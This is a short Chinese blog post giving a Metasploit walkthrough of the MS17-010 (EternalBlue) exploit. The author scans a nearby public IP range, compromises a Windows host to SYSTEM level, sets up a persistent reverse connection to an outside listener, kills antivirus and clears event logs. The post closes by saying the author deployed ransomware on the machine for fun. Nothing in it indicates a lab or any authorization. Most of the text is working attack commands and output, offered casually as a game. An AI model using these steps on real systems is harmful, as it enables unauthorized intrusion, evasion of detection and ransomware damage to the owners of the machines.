最近正好有 ms17_010 这种好用的洞,为什么不好好玩玩呢?

远端准备好监听。

msf > use use exploit/multi/handler
msf exploit(handler) > set lhost 1.1.1.1
msf exploit(handler) > set lport 5353
msf exploit(handler) > run -j

然后就开始扫机器看看有没有漏洞咯?

# 先打开 msfconsole
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set RHOSTS 42.xxx.xxx.xxx/24 # 直接用了附近的 CIDR
msf auxiliary(smb_ms17_010) > set THREADS 64 #64 线程
msf auxiliary(smb_ms17_010) > run

然后就是等待,等他扫到东西再说。

过一会(打了会炉石)就会有反应啦。

2.2.2.2:445     - Host is likely VULNERABLE to MS17-010!  (Windows 10 Pro 14393)

然后就可以打了。

msf auxiliary(smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp # 初始 payload
msf exploit(ms17_010_eternalblue) > set rhost 2.2.2.2
msf exploit(ms17_010_eternalblue) > run -j

过一会应该就有 session。

msf exploit(ms17_010_eternalblue) > sessions -i

首先看一眼自己的权限,这次运气比较好直接拿到了 SYSTEM。

meterpreter > getuid
NT AUTHORITY/SYSTEM

进入 meterpreter 之后就可以开个长久的监听了。

meterpreter > run persistence -U -i 5 -p 5353 -r 1.1.1.1 # 用户登录的时候开始反弹
meterpreter > run killav # 干掉杀毒软件
meterpreter > clearev # 清除事件查看器

接下来就可以玩了~

于是随手做了个 Ransomware 丢上去试了试(


Creative Commons License
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.